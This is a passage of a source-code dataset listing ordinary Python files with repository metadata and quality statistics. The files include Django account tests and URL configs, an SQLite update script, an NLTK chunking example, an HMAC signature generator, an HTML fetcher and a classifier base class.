if d != c:
print ' Check %s (given; %i) != %s (parsed)' % (d,d.day_of_week,c)
elif i % 1000 == 0:
print d,'ok'
| 28.232295 | 78 | 0.616396 | 1,347 | 9,966 | 4.512992 | 0.164811 | 0.01974 | 0.034216 | 0.024182 | 0.583649 | 0.548939 | 0.519658 | 0.492351 | 0.492351 | 0.453858 | 0 | 0.024527 | 0.26771 | 9,966 | 352 | 79 | 28.3125 | 0.808441 | 0.024082 | 0 | 0.613953 | 0 | 0 | 0.09259 | 0.007515 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.009302 | 0.009302 | null | null | 0.009302 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a53556e93e0bdd6cf21ccc8be26e03130064d64a | 5,309 | py | Python | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | tests/test_accounts.py | thesus/claypot | ce6871bd2de7a01c31448323753168115114087c | [
"MIT"
] | null | null | null | import pytest
from django.urls import reverse
from django.test import override_settings
from django.contrib.auth import authenticate
@pytest.mark.django_db
def test_login(api_client, django_user_model):
"""Tests the ability to login."""
username = "user"
password = "userpassword"
user = django_user_model.objects.create_user(username=username, password=password)
response = api_client.post(
reverse("api:accounts-login"), {"username": username, "password": password}
)
# User should be redirected to the profile
assert response.status_code == 302
assert response.url == reverse("api:accounts-detail", kwargs={"pk": user.pk})
# Try wrong password
response = api_client.post(
reverse("api:accounts-login"),
{"username": username, "password": password + "_"},
)
assert response.status_code == 400
# Disable user
user.is_active = False
user.save()
response = api_client.post(
reverse("api:accounts-login"), {"username": username, "password": password}
)
assert response.status_code == 400
@pytest.mark.django_db
def test_account_permissions(api_client, user, admin_user):
"""Tests permission on profiles"""
assert (
api_client.get(
reverse("api:accounts-detail", kwargs={"pk": user.pk})
).status_code
== 403
)
# Users should only be able to see themselves
api_client.force_login(user)
assert (
api_client.get(
reverse("api:accounts-detail", kwargs={"pk": user.pk})
).status_code
== 200
)
assert (
api_client.get(
reverse("api:accounts-detail", kwargs={"pk": admin_user.pk})
).status_code
== 403
)
# Admins should be able to see all users
api_client.force_login(admin_user)
assert (
api_client.get(
reverse("api:accounts-detail", kwargs={"pk": user.pk})
).status_code
== 200
)
@pytest.mark.django_db
def test_logout(api_client, user):
"""Tests if users are logged out correctly."""
api_client.force_login(user)
assert "_auth_user_id" in api_client.session.keys()
response = api_client.post(reverse("api:accounts-logout"))
assert response.status_code == 200
assert not "_auth_user_id" in api_client.session.keys()
@pytest.mark.django_db
def test_create_new_account(api_client, mailoutbox, django_user_model):
"""Tests creation of a new account."""
response = api_client.post(
reverse("api:accounts-signup"),
{
"password1": "password",
"password2": "password",
"username": "user",
"email": "user@test.tld",
},
)
user = django_user_model.objects.get(username="user")
# Check email and extract link
assert response.status_code == 200
assert not user.is_active
assert len(mailoutbox) == 1
assert list(mailoutbox[0].to) == ["user@test.tld"]
url = mailoutbox[0].body.splitlines()[7]
# Activate account
response = api_client.get(url)
# Do query again, user changeqd
user = django_user_model.objects.get(username="user")
# Redirect to home page
assert response.status_code == 302
assert user.is_active
# Link should be invalid by now
response = api_client.get(url)
assert response.status_code == 400
def test_invalid_account_links(api_client):
"""Tests if account activation can handle broken links."""
# Run without token and uid parameters
response = api_client.get(reverse("api:accounts-signup-confirm"))
assert response.status_code == 400
# Run with invalid token and uid
response = api_client.get(
reverse("api:accounts-signup-confirm") + "?token=bs&uid=r23"
)
assert response.status_code == 400
@override_settings(SIGNUP_TIMEOUT_DAYS=-1)
def test_expired_account_link(api_client, django_user_model, mailoutbox):
"""Tests if account activation renews activation link after the given timeout."""
response = api_client.post(
reverse("api:accounts-signup"),
{
"password1": "password",
"password2": "password",
"username": "user",
"email": "user@test.tld",
},
)
url = mailoutbox[0].body.splitlines()[7]
response = api_client.get(url)
assert response.status_code == 400
# Link should be sent again in an email after clicking on the expired link.
assert len(mailoutbox) == 2
@pytest.mark.django_db
def test_password_reset(api_client, user, mailoutbox):
"""Tests resetting of a user password."""
user.email = "user@test.tld"
user.save()
response = api_client.post(reverse("api:accounts-reset"), {"email": user.email})
assert response.status_code == 200
assert len(mailoutbox) == 1
uid, token = mailoutbox[0].body.splitlines()[7].split("/")[-2:]
password = "apfelmus"
response = api_client.post(
reverse("api:accounts-reset-confirm"),
{
"token": token,
"uid": uid,
"new_password1": password,
"new_password2": password,
},
)
assert response.status_code == 200
assert authenticate(username=user.username, password=password) is not None
| 27.507772 | 86 | 0.645319 | 648 | 5,309 | 5.132716 | 0.217593 | 0.078473 | 0.081179 | 0.086591 | 0.594107 | 0.53187 | 0.434155 | 0.400782 | 0.330728 | 0.262778 | 0 | 0.01672 | 0.233942 | 5,309 | 192 | 87 | 27.651042 | 0.801082 | 0.135995 | 0 | 0.536 | 0 | 0 | 0.139238 | 0.017625 | 0 | 0 | 0 | 0 | 0.208 | 1 | 0.056 | false | 0.112 | 0.032 | 0 | 0.088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a539c03f1559c0cb02ad04dfca283b2e99e15c10 | 362 | py | Python | messier_objects/views.py | DanielPDWalker/Astrophoto | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | null | null | null | messier_objects/views.py | DanielPDWalker/Astrophoto | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | 12 | 2020-07-26T06:20:22.000Z | 2022-03-12T00:43:09.000Z | messier_objects/views.py | DanielPDWalker/Astrophoto-API | 9a7ee59deb291617baa3ab8724b8ce5970e6ea9f | [
"MIT"
] | null | null | null | from rest_framework import viewsets, permissions
from messier_objects import serializers, models
class MessierViewSet(viewsets.ModelViewSet):
"""Messier Object API View"""
serializer_class = serializers.MessierSerializer
queryset = models.MessierObject.objects.all()
permission_classes = (
permissions.IsAuthenticatedOrReadOnly,
)
| 27.846154 | 52 | 0.770718 | 33 | 362 | 8.333333 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160221 | 362 | 12 | 53 | 30.166667 | 0.904605 | 0.063536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a53fc0be336ea6ad0f0c4d26a91c1ed745c86270 | 398 | py | Python | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | setup.py | humantech/smush.py | f722c89ae2d9405ac0c183224fdcd59dd4246944 | [
"MIT"
] | null | null | null | from distutils.core import setup
setup(name='Smush',
version='1.0',
description='Lossless image optimiser script',
url='https://github.com/thebeansgroup/smush.py',
platforms='OS Independent',
keywords="image optimize lossless",
scripts=['bin/smush_it'],
packages=['smush', 'smush.optimisers', 'smush.optimisers.formats'],
include_package_data=True
) | 33.166667 | 73 | 0.678392 | 45 | 398 | 5.933333 | 0.8 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006098 | 0.175879 | 398 | 12 | 74 | 33.166667 | 0.807927 | 0 | 0 | 0 | 0 | 0 | 0.43609 | 0.06015 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a54633e17d7fbb56c1a0df03249c89028178ec7b | 190 | py | Python | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | SQLITE3 & python/SQLITE3 update data from database.py | OSAMAMOHAMED1234/python_projects | fb4bc7356847c3f46df690a9386cf970377a6f7c | [
"MIT"
] | null | null | null | import sqlite3
con = sqlite3.connect("database.db")
c = con.cursor()
c.execute("UPDATE names SET fname='OSAMA', lname='MOHAMED', age=22, salary=5000 WHERE age=20")
con.commit()
con.close()
| 23.75 | 94 | 0.715789 | 30 | 190 | 4.533333 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.105263 | 190 | 7 | 95 | 27.142857 | 0.741176 | 0 | 0 | 0 | 0 | 0.166667 | 0.484211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a55af0b704a4ce32a2e43a1d3948451e253423f2 | 334 | py | Python | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | 2 | 2020-06-19T11:53:02.000Z | 2020-06-24T06:25:00.000Z | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/orders/urls.py | Nicholas-violet/meiduo_project_preview | 3c17fa45d11a8889710ca7a522ac047bb99b21b8 | [
"MIT"
] | null | null | null | from django.urls import path,re_path
from . import views
# urlpatterns是被Django自动识别的路由列表变量:定义该应用的所有路由信息
urlpatterns = [
# 函数视图路由语法:
# path('网络地址正则表达式', 函数视图名),
# 订单确认
re_path(r'^orders/settlement/$', views.OrderSettlementView.as_view()),
# 订单提交
re_path(r'^orders/commit/$', views.OrderCommitView.as_view()),
] | 25.692308 | 74 | 0.703593 | 37 | 334 | 6.216216 | 0.621622 | 0.078261 | 0.06087 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155689 | 334 | 13 | 75 | 25.692308 | 0.815603 | 0.266467 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a55b3814136e22e453c8afa8c9dd21b989ed96dd | 857 | py | Python | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | dapricot/auth/migrations/0002_auto_20190602_1858.py | softapr/django_apricot | 911b6627a5ffaf3f7b13a099ca129f3a2ffda558 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.2.1 on 2019-06-02 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daauth', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='permissionsmixin',
options={},
),
migrations.AlterModelOptions(
name='user',
options={},
),
migrations.AddField(
model_name='user',
name='username',
field=models.CharField(default='', max_length=30, unique=True, verbose_name='username'),
preserve_default=False,
),
migrations.AlterField(
model_name='user',
name='avatar',
field=models.ImageField(blank=True, null=True, upload_to='dapricot/avatars/'),
),
]
| 25.969697 | 100 | 0.556593 | 77 | 857 | 6.103896 | 0.662338 | 0.051064 | 0.131915 | 0.07234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036021 | 0.31972 | 857 | 32 | 101 | 26.78125 | 0.770154 | 0.052509 | 0 | 0.384615 | 1 | 0 | 0.104938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a55f53f0be49a0b321987cd51bf4465fd768df66 | 392 | py | Python | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | 1 | 2015-01-06T11:37:14.000Z | 2015-01-06T11:37:14.000Z | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | null | null | null | ch7_Extracting_Information_from_Text/chinker.py | MingjunZhou/nltk_book | 62eef0f5a1855e3d6c523a8d58e8725f459d2fbd | [
"BSD-3-Clause"
] | null | null | null | import nltk
grammar = r"""
NP:
{<.*>+} # Chunk everything
}<VBD|IN>+{ # Chink sequences of VBD and IN
"""
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"),
("dog", "NN"), ("barked", "VBD"), ("at", "IN"),
("the", "DT"), ("cat", "NN")]
cp = nltk.RegexpParser(grammar)
print cp.parse(sentence)
| 28 | 64 | 0.423469 | 40 | 392 | 4.15 | 0.7 | 0.060241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.331633 | 392 | 13 | 65 | 30.153846 | 0.633588 | 0 | 0 | 0 | 0 | 0 | 0.477041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a56885a39dbbbead3dafd870f9aae47fc24d841e | 1,739 | py | Python | util/sigen.py | cubicdaiya/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | 5 | 2015-12-21T16:29:02.000Z | 2019-03-19T08:13:51.000Z | util/sigen.py | RekGRpth/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | null | null | null | util/sigen.py | RekGRpth/ngx_access_token | 27bab29e718684b8b02ed3153cdecac83b66b2bf | [
"MIT"
] | 2 | 2016-04-14T23:39:56.000Z | 2019-03-19T08:13:52.000Z | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Tatsuhiko Kubo <cubicdaiya@gmail.com>
#
# signature generator
#
import sys
import hmac
from hashlib import sha1
import base64
import binascii
import argparse
def build_parser():
parser = argparse.ArgumentParser(description='Signature Generator', add_help=False)
parser.add_argument('-p', '--public', action='store', type=str, help='public-key')
parser.add_argument('-s', '--secret', action='store', type=str, help='secret-key', required=True)
parser.add_argument('-m', '--method', action='store', type=str, help='http-method')
parser.add_argument('-u', '--uri', action='store', type=str, help='uri')
parser.add_argument('-t', '--time', action='store', type=str, help='epoch')
parser.add_argument('-r', '--raw', action='store', type=str, help='http-method + uri + epoch + public-key')
parser.add_argument('--help', action='store_true', default=False, help='show this help message and exit')
return parser
def build_raw(args):
if args.public is None or \
args.method is None or \
args.uri is None or \
args.time is None:
raise Exception
return args.method + args.uri + args.time + args.public
if __name__ == '__main__':
parser = build_parser()
args = parser.parse_args()
if args.help == True:
parser.print_help()
sys.exit(0)
if args.raw is not None:
raw = args.raw
else:
try:
raw = build_raw(args)
except:
parser.print_help()
sys.exit(0)
hashed = hmac.new(args.secret, raw, sha1)
print binascii.b2a_base64(hashed.digest())[:-1]
| 32.811321 | 124 | 0.608396 | 224 | 1,739 | 4.611607 | 0.357143 | 0.060987 | 0.115198 | 0.10455 | 0.242014 | 0.106486 | 0.061955 | 0 | 0 | 0 | 0 | 0.011398 | 0.243243 | 1,739 | 52 | 125 | 33.442308 | 0.773556 | 0.056354 | 0 | 0.102564 | 0 | 0 | 0.142595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a56c92342f31e1936472ed752e5069e6745f8cfc | 699 | py | Python | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | game_hub/game_hub/accounts/urls.py | ivailoiliev84/GameHub | 2c3ef225da9e2e0177c2cab781328ded73ad8720 | [
"MIT"
] | null | null | null | from django.urls import path
from game_hub.accounts.views import RegisterUser, logout_user, ProfilePageView, \
LoginUserView, ChangePasswordView, ProfileEditView, ProfileDeleteView
urlpatterns = (
path('register/', RegisterUser.as_view(), name='register'),
path('log-in/', LoginUserView.as_view(), name='login'),
path('log-out/', logout_user, name='logout'),
path('change-password/', ChangePasswordView.as_view(), name='change password'),
path('profile/', ProfilePageView.as_view(), name='profile'),
path('profile-edit/<int:pk>', ProfileEditView.as_view(), name='profile edit'),
path('profile-delte/<int:pk>', ProfileDeleteView.as_view(), name='profile delete')
)
| 43.6875 | 86 | 0.719599 | 80 | 699 | 6.175 | 0.425 | 0.072874 | 0.121457 | 0.103239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111588 | 699 | 15 | 87 | 46.6 | 0.795491 | 0 | 0 | 0 | 0 | 0 | 0.226037 | 0.061516 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a56cd9842da7d235a104071c8d40481b9ff9bde5 | 1,364 | py | Python | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | 1 | 2018-04-19T06:48:16.000Z | 2018-04-19T06:48:16.000Z | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | null | null | null | goose/network.py | frnsys/python-goose | 7eca5694e8f0d8e45c986b52e904fa6baaa6e85e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""\
This is a python port of "Goose" orignialy licensed to Gravity.com
under one or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.
Python port was written by Xavier Grangier for Recrutae
Gravity.com licenses this file
to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
try:
import urllib2 as request
except ImportError:
from urllib import request
class HtmlFetcher(object):
def __init__(self):
pass
def get_http_client(self):
pass
def get_html(self, config, url):
"""\
"""
headers = {'User-agent': config.browser_user_agent}
req = request.Request(url, headers=headers)
try:
result = request.urlopen(req).read()
except:
return None
return result
| 27.28 | 72 | 0.710411 | 191 | 1,364 | 5.026178 | 0.591623 | 0.0625 | 0.027083 | 0.033333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005655 | 0.222141 | 1,364 | 49 | 73 | 27.836735 | 0.899152 | 0.625367 | 0 | 0.235294 | 0 | 0 | 0.020619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.117647 | 0.176471 | 0 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a57cdedb5dac53e59a413dc3b21f8571b80089a7 | 776 | py | Python | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | 1 | 2019-12-25T17:02:30.000Z | 2019-12-25T17:02:30.000Z | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | null | null | null | Heart_Score.py | alokm014/Heart-Score | 44d862c445b4c0f90b73d7496f78c11a188e251f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
from matplotlib.pyplot import plot, scatter, show
from numpy import NaN, Inf, arange, isscalar, asarray, array
# In[2]:
get_ipython().magic(u'matplotlib inline')
# In[3]:
df=pd.read_csv("Heart_Rate.csv")
# In[4]:
df.info()
# In[5]:
signal=df['Signal'].tolist()
# In[6]:
plot(signal)
# In[7]:
plot(signal[0:99])
# In[8]:
beat_count=0
maxtab=[]
for k in range(1,len(signal)-1):
if(signal[k] > signal[k-1] and signal[k] > signal[k+1] and signal[k] > 1):
maxtab.append(signal[k])
beat_count= beat_count+1
N = len(signal)
fs = 100
duration_in_sec = N/fs
duration_in_min = duration_in_sec/60
BPM = beat_count/duration_in_min
print"Heart Rate:" +str(BPM)
| 11.938462 | 78 | 0.641753 | 133 | 776 | 3.631579 | 0.503759 | 0.086957 | 0.049689 | 0.057971 | 0.089027 | 0.089027 | 0.089027 | 0.089027 | 0 | 0 | 0 | 0.038095 | 0.188144 | 776 | 64 | 79 | 12.125 | 0.728571 | 0.115979 | 0 | 0 | 0 | 0 | 0.071111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a580cb1b1aec9ce853e31bbb6c1dcf39c5415edf | 1,922 | py | Python | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 552 | 2018-03-14T07:40:44.000Z | 2022-03-30T19:15:23.000Z | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 12 | 2018-03-19T10:29:56.000Z | 2021-12-18T04:47:29.000Z | DaPy/methods/classifiers/classifier.py | huihui7987/DaPy | b2bf72707ffcc92d05af1ac890e0786d5787816e | [
"RSA-MD"
] | 49 | 2018-03-13T14:27:00.000Z | 2022-02-26T09:52:11.000Z | from DaPy.core import Series, SeriesSet
from DaPy.core import is_seq
from copy import copy
def proba2label(seq, labels):
if hasattr(seq, 'shape') is False:
seq = SeriesSet(seq)
if seq.shape[1] > 1:
return clf_multilabel(seq, labels)
return clf_binlabel(seq, labels)
def clf_multilabel(seq, groupby=None):
if is_seq(groupby):
groupby = dict(enumerate(map(str, groupby)))
if not groupby:
groupby = dict()
assert isinstance(groupby, dict), '`labels` must be a list of str or dict object.'
max_ind = seq.argmax(axis=1).T.tolist()[0]
return Series(groupby.get(int(_), _) for _ in max_ind)
def clf_binlabel(seq, labels, cutpoint=0.5):
return Series(labels[0] if _ >= cutpoint else labels[1] for _ in seq)
class BaseClassifier(object):
def __init__(self):
self._labels = []
@property
def labels(self):
return copy(self._labels)
def _calculate_accuracy(self, predict, target):
pred_labels = predict.argmax(axis=1).T.tolist()[0]
targ_labels = target.argmax(axis=1).T.tolist()[0]
return sum(1.0 for p, t in zip(pred_labels, targ_labels) if p == t) / len(predict)
def predict_proba(self, X):
'''
Predict your own data with fitted model
Paremeter
---------
data : matrix
The new data that you expect to predict.
Return
------
Matrix: the predict result of your data.
'''
X = self._engine.mat(X)
return self._forecast(X)
def predict(self, X):
'''
Predict your data with a fitted model and return the label
Parameter
---------
data : matrix
the data that you expect to predict
Return
------
Series : the labels of each record
'''
return proba2label(self.predict_proba(X), self._labels)
| 27.855072 | 90 | 0.599376 | 255 | 1,922 | 4.4 | 0.356863 | 0.032086 | 0.029412 | 0.032086 | 0.118538 | 0.118538 | 0.101604 | 0 | 0 | 0 | 0 | 0.011687 | 0.287721 | 1,922 | 68 | 91 | 28.264706 | 0.807889 | 0.186785 | 0 | 0 | 0 | 0 | 0.036325 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 1 | 0.235294 | false | 0 | 0.088235 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.